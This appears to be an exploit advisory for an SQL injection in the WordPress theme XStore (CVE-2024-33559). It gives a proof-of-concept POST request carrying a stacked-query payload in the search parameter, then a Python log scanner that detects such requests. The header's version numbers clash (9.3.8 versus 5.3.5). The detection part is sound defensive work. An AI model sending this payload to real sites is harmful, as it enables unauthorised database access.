# Exploit Title: WordPress Theme XStore 9.3.8 - SQLi
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: abdualhadi khalifa (https://Twitter.com/absholi_ly)
# Version: 5.3.5
# Tested on: Windows 10
# CVE: CVE-2024-33559
PoC
POST /?s=%27%3b+SELECT+*+FROM+wp_posts%3b+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
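
A detection-side view of the request above, as an added example that is not part of the original advisory: it decodes the `s` search parameter from web access-log lines and flags a closing quote followed by a stacked statement or a trailing SQL comment. The combined log format, the function names and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Added example, not code from the advisory or from the XStore theme.
# Assumption: access logs in combined format; SAMPLE_LOG below is constructed.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A quote that closes the string, then a second (stacked) SQL statement.
STACKED_RE = re.compile(
    r"""['"]\s*;\s*(select|insert|update|delete|drop|union)\b""", re.I)
# A quote somewhere, and the value ends in an SQL comment opener.
COMMENT_RE = re.compile(r"""['"].*(--|#|/\*)\s*$""", re.S)


def search_param_findings(log_line):
    """Return the reasons the decoded `s` parameter looks like SQL injection."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    reasons = []
    # parse_qs percent-decodes values and turns '+' into spaces.
    for value in parse_qs(query, keep_blank_values=True).get("s", []):
        if STACKED_RE.search(value):
            reasons.append("stacked-statement")
        if COMMENT_RE.search(value):
            reasons.append("quote-then-comment")
    return reasons


SAMPLE_LOG = [  # constructed log lines
    '203.0.113.7 - - [16/May/2024:10:00:01 +0000] '
    '"POST /?s=%27%3b+SELECT+*+FROM+wp_posts%3b+-- HTTP/1.1" 200 5120',
    '203.0.113.8 - - [16/May/2024:10:00:05 +0000] '
    '"GET /?s=blue+t-shirt HTTP/1.1" 200 4210',
    '203.0.113.9 - - [16/May/2024:10:00:09 +0000] '
    '"GET /?s=rock+%27n%27+roll HTTP/1.1" 200 4388',
]


def scan(lines):
    """Return (client_ip, reasons) for every line with at least one finding."""
    return [(l.split()[0], r) for l in lines if (r := search_param_findings(l))]


if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ",".join(reasons))
```

The third sample line shows why a bare quote is not enough to alert on: ordinary searches contain apostrophes, so the rules require a statement separator or comment marker after the quote.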